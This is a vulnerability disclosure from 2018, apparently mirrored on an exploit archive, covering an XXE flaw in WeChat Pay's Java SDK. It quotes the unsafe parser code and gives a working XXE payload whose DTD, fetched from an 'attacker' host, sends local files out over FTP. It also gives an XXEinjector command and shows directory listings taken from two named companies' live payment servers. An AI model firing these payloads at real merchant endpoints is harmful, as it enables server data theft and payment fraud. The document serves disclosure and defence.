exploit the possibilities

WeChat Pay SDK XXE Injection

WeChat Pay SDK XXE Injection
Posted Jul 2, 2018
Authored by Rose Jackcode

The WePay Chat SDK suffers from an XML external entity injection vulnerability.

tags | exploit
MD5 | d342061025f7c5d2655f550f549bb5da

WeChat Pay SDK XXE Injection

Change Mirror Download
Hi List,


[Title]


XXE in WeChat Pay Sdk ( WeChat leave a backdoor on merchant websites)


------------------------------------------


[Background]

aMobile payments surge to $9 trillion a year, changing how people shop,
borrowaeven panhandlea, as WSJ.com once reported. As a payment security
researcher, I occasionally found a perilous problem about WeChat Pay which
I think may be esay to make use of. Therefore, I hope to be able to
contact with WeChat Pay quickly.


------------------------------------------


[Description]

When using WeChat payment merchants need providing a notification URL
to accept asynchronous payment results. Unfortunately, WeChat
unintentionally provides a xxe vulnerability in the JAVA version SDK which
handles this result. The attacker can build malicious payload towards the
notification URL to steal any information of the merchant server as he or
she want. Once the attacker get the crucial security key (md5-key and
merchant-Id etc.) of the merchant , he can even buy anything without paying
by just sending forged info to deceive the merchants.

WeChat can fix it by updating the SDK quite easily, however the bad side

is while exposing merchants may need a long time to go for the sake of time,
cost and skills needed.


------------------------------------------


[Authors]


1024fresher

------------------------------------------


[Detail]


The SDK in this page: https://pay.weixin.qq.com/wiki/doc/api/jsapi.php
chapter=11_1

Just in java vision:
https://pay.weixin.qq.com/wiki/doc/api/download/WxPayAPI_JAVA_v3.zip

or
https://drive.google.com/file/d/1AoxfkxD7Kokl0uqILaqTnGAXSUR1o6ud/view(
Backup i1/4





README.md in WxPayApi_JAVA_v3.zip,it show more details:



notify code example:

[

String notifyData = "....";

MyConfig config = new MyConfig();

WXPay wxpay = new WXPay(config);

//conver to map

Map<String, String> notifyMap = WXPayUtil.xmlToMap(notifyData);


if (wxpay.isPayResultNotifySignatureValid(notifyMap)) {

//do business logic

}

else {

}



]

WXPayUtil source code

[


public static Map<String, String> xmlToMap(String strXML) throws
Exception {

try {

Map<String, String> data = new HashMap<String, String>();

/*** not disabled xxe *****/

//start parse


DocumentBuilderFactory documentBuilderFactory =
DocumentBuilderFactory.newInstance();

DocumentBuilder documentBuilder =
documentBuilderFactory.newDocumentBuilder();

InputStream stream = new ByteArrayInputStream(strXML.getBytes(
"UTF-8"));

org.w3c.dom.Document doc = documentBuilder.parse(stream);



//end parse





doc.getDocumentElement().normalize();

NodeList nodeList = doc.getDocumentElement().getChildNodes();

for (int idx = 0; idx < nodeList.getLength(); ++idx) {

Node node = nodeList.item(idx);

if (node.getNodeType() == Node.ELEMENT_NODE) {

org.w3c.dom.Element element = (org.w3c.dom.Element) node
;

data.put(element.getNodeName(), element.getTextContent
());

}

}

try {

stream.close();

} catch (Exception ex) {

// do nothing

}

return data;

} catch (Exception ex) {

WXPayUtil.getLogger().warn("Invalid XML, can not convert to
map. Error message: {}. XML content: {}", ex.getMessage(), strXML);

throw ex;

}

}



]








------------------------------------------


[Attack demo]



Post merchant notification url with payload:


<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE root [

<!ENTITY % attack SYSTEM "file:///etc/">

<!ENTITY % xxe SYSTEM "http://attacker:8080/shell/data.dtd">

%xxe;

]>


data.dtd:


<!ENTITY % shell "<!ENTITY &#x25; upload SYSTEM 'ftp://attack:33/%attack;
'>">

%shell;

%upload;



or use XXEinjector tool ahttps://github.com/enjoiz/XXEinjectora


ruby XXEinjector.rb --host=attacker --path=/etc --file=req.txt --ssl


req.txt :

POST merchant_notification_url HTTP/1.1

Host: merchant_notification_url_host

User-Agent: curl/7.43.0

Accept: */*

Content-Length: 57

Content-Type: application/x-www-form-urlencoded


XXEINJECT





In order to prove this, I got 2 chinese famous company:

aamomo: Well-known chat tools like WeChat

bavivo i1/4China's famous mobile phone,that also famous in my country



Example momo :

attack:

notify url: https://pay.immomo.com/weixin/notify

cmd: /home/



result:



***

logs

zhang.jiax**

zhang.shaol**

zhang.xia**

****


attack:

notify url: https://pay.immomo.com/weixin/notify

cmd: /home/logs



result:

***

moa-service

momotrace

****


Example vivo :

attack:

notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo

cmd: /home/



result:

tomcat


attack:

notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo

cmd: /home/tomcat

result:

.bash_logout

.bash_profile

.bashrc

logs


attack:

notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo

cmd: /home/tomcat/logs

result:

****

tomcat-2018-06-28.log

tomcat-2018-06-29.log

tomcat-2018-06-30.log

*****








------------------------------------------


[Reference]


https://www.youtube.com/watch?v=BZOg_NgvP18

https://www.blackhat.com/docs/us-15/materials/us-15-Wang-FileCry-The-New-Age-Of-XXE-java-wp.pdf



Regards,


1024rosecode


Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    13 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    1 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    15 Files
  • 7
    Oct 7th
    15 Files
  • 8
    Oct 8th
    11 Files
  • 9
    Oct 9th
    3 Files
  • 10
    Oct 10th
    1 Files
  • 11
    Oct 11th
    1 Files
  • 12
    Oct 12th
    8 Files
  • 13
    Oct 13th
    12 Files
  • 14
    Oct 14th
    23 Files
  • 15
    Oct 15th
    4 Files
  • 16
    Oct 16th
    13 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    1 Files
  • 19
    Oct 19th
    27 Files
  • 20
    Oct 20th
    41 Files
  • 21
    Oct 21st
    18 Files
  • 22
    Oct 22nd
    16 Files
  • 23
    Oct 23rd
    2 Files
  • 24
    Oct 24th
    1 Files
  • 25
    Oct 25th
    1 Files
  • 26
    Oct 26th
    17 Files
  • 27
    Oct 27th
    19 Files
  • 28
    Oct 28th
    29 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close